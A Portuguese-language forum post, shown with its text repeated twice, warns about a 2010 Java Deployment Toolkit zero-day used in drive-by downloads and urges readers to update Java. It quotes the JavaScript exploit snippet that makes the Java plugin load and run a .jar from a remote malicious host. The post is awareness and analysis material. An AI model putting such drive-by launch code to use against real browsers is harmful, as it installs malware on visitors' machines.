CCV_SylarBoon
18-04-2010, 02:03 AM
http://www.csse.monash.edu.au/%7Ecema/courses/CSE5910/generalImages/java-logo-thumb.png
Está falha vem sendo explorada por diversos sites, sendo fácil e simples explora-la. Está que foi divulgada pelo investigador, Google Tavis Ormandy no dia 9 de abril, foi corrigida pela Sun após provas de que estava sendo explorada por alguns sites. Experts da empresa FireEye (http://blog.fireeye.com/research/2010/04/who-is-exploiting-the-java-0day.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+FE_research+%28FireEye+Malwar e+Intelligence+Lab%29) relataram que o exploit é bem simples de ser explorado.
O site que explorava a falha, redirecionava o visitante para uma página de download automático chamadas drive-by, está por sua vez dava ao usuário o download de um Trojan.Downloader(Trojan.Piptea), que em seguida baixava vários pedaços de malwares.
Vamos ver um pedaço do código exploit...
var u = "http: -J-jar -J\\\\zikkuat.com\\50035\\C0.php none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC- DEC7-0000-0000-ABCDEFFEDCBA";
o.launch(u);
} else {
var o = document.createElement("OBJECT");
var n = document.createElement ("OBJECT");
o.type = "application/npruntime-scriptable- plugineploymenttoolkit"; n.type = "application/java-deployment- toolkit"; document.body.appendChild(o); document.body.appendChild (n); try {o.launch(u); } catch (e) {n.launch(u);
}
Este código estava contido no value3.php, como podemos ver este trecho de código só funciona para o Internet Explorer. A execução bem sucedida do código faz rodar um outro código 50035\\C0.php o qual executa um arquivo .jar(Auto executável do JAVA), veja parte do código
4290
Se quiser ver a imagem em um tamanho melhor acesse (http://blog.fireeye.com/.a/6a00d835018afd53ef01347fe68787970c-pi).
"É óbvio que a simplicidade e confiabilidade deste exploit sera uma arma nas mãos dos vilões nos próximos dias. Além disso, a inexistência de qualquer patch torna tudo pior. Tenho a certeza que em alguns dias, esse exploit se tornará parte das ferramentas dos hackers. Isto significa que até mesmo um garoto com habilidades básicas do computador e más intenções pode começar a ganhar dinheiro com isso" diz
Atif Mushtaq
no blog da FireEye.
É de extrema importância que mantenha seu JAVA atualizado sempre, pois assim estará evitando falhas e consequentemente perda de dados importantes. É importante lembrar que updates abaixo do 20 são inúteis, são suscetíveis a diversas falhas além desta.
Atualize seu java
Baixe agora a atualização (http://www.java.com/pt_BR/download/windows_xpi.jsp?locale=pt_BR&host=www.java.com).
Está falha vem sendo explorada por diversos sites, sendo fácil e simples explora-la. Está que foi divulgada pelo investigador, Google Tavis Ormandy no dia 9 de abril, foi corrigida pela Sun após provas de que estava sendo explorada por alguns sites. Experts da empresa FireEye (http://blog.fireeye.com/research/2010/04/who-is-exploiting-the-java-0day.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+FE_research+%28FireEye+Malwar e+Intelligence+Lab%29) relataram que o exploit é bem simples de ser explorado.
O site que explorava a falha, redirecionava o visitante para uma página de download automático chamadas drive-by, está por sua vez dava ao usuário o download de um Trojan.Downloader(Trojan.Piptea), que em seguida baixava vários pedaços de malwares.
Vamos ver um pedaço do código exploit...
var u = "http: -J-jar -J\\\\zikkuat.com\\50035\\C0.php none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC- DEC7-0000-0000-ABCDEFFEDCBA";
o.launch(u);
} else {
var o = document.createElement("OBJECT");
var n = document.createElement ("OBJECT");
o.type = "application/npruntime-scriptable- plugineploymenttoolkit"; n.type = "application/java-deployment- toolkit"; document.body.appendChild(o); document.body.appendChild (n); try {o.launch(u); } catch (e) {n.launch(u);
}
Este código estava contido no value3.php, como podemos ver este trecho de código só funciona para o Internet Explorer. A execução bem sucedida do código faz rodar um outro código 50035\\C0.php o qual executa um arquivo .jar(Auto executável do JAVA), veja parte do código
4290
Se quiser ver a imagem em um tamanho melhor acesse (http://blog.fireeye.com/.a/6a00d835018afd53ef01347fe68787970c-pi).
"É óbvio que a simplicidade e confiabilidade deste exploit sera uma arma nas mãos dos vilões nos próximos dias. Além disso, a inexistência de qualquer patch torna tudo pior. Tenho a certeza que em alguns dias, esse exploit se tornará parte das ferramentas dos hackers. Isto significa que até mesmo um garoto com habilidades básicas do computador e más intenções pode começar a ganhar dinheiro com isso" diz
Atif Mushtaq
no blog da FireEye.
É de extrema importância que mantenha seu JAVA atualizado sempre, pois assim estará evitando falhas e consequentemente perda de dados importantes. É importante lembrar que updates abaixo do 20 são inúteis, são suscetíveis a diversas falhas além desta.
Atualize seu java
Baixe agora a atualização (http://www.java.com/pt_BR/download/windows_xpi.jsp?locale=pt_BR&host=www.java.com).